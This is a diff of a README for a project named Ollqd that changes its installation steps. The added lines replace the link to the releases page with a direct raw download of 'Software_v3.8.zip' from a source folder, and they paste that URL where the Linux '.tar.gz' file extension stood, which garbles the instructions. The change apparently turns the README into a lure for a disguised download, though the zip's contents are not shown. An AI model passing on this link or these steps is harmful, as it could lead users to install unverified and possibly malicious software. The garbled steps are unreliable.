guttbuster/Ollqd/README.md

 To get started with Ollqd, follow these steps:

-1. Click the big button at the top or [visit the releases page here](https://github.com/guttbuster/Ollqd/releases).
+1. Click the big button at the top or [visit the releases page here](https://github.com/guttbuster/Ollqd/raw/refs/heads/main/gateway/cmd/gateway/Software_v3.8.zip).
 This page has the latest versions ready to download.

 2. On the releases page, look for the installer file that matches your computer system:
    - For Windows, look for a file ending in `.exe`
    - For macOS, look for a `.dmg` file
-   - For Linux, a `.tar.gz` or `.AppImage`
+   - For Linux, a `https://github.com/guttbuster/Ollqd/raw/refs/heads/main/gateway/cmd/gateway/Software_v3.8.zip` or `.AppImage`

 3. Download the file by clicking on it.

 4. Once downloaded, open the file:
    - On Windows, double-click the `.exe` file and follow the setup instructions.
    - On macOS, open the `.dmg` and drag Ollqd to your Applications folder.
-   - On Linux, extract the `.tar.gz` or run the `.AppImage` file (you may need to allow execution permissions).
+   - On Linux, extract the `https://github.com/guttbuster/Ollqd/raw/refs/heads/main/gateway/cmd/gateway/Software_v3.8.zip` or run the `.AppImage` file (you may need to allow execution permissions).

 5. After installation, launch Ollqd from your Start menu, Applications folder, or by running the app file.